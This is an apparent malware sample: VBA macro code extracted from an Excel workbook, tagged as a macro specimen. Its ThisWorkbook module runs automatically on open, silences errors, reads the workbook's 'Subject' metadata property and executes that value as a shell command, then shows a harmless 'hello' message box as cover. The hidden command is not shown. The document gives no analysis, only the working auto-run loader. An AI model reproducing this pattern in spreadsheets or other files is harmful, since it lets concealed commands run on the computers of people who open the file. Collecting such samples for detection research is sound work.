Attribute VB_Name = "Module1"
Private Sub Workbook_Open()
MsgBox "hello text"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    On Error Resume Next
    Dim p As DocumentProperty
    For Each p In ThisWorkbook.BuiltinDocumentProperties
        If p.Name = "Subject" Then
            Shell (p.Value)
        End If
    Next p
    MsgBox "hello"
End Sub


INQUEST-PP=macro
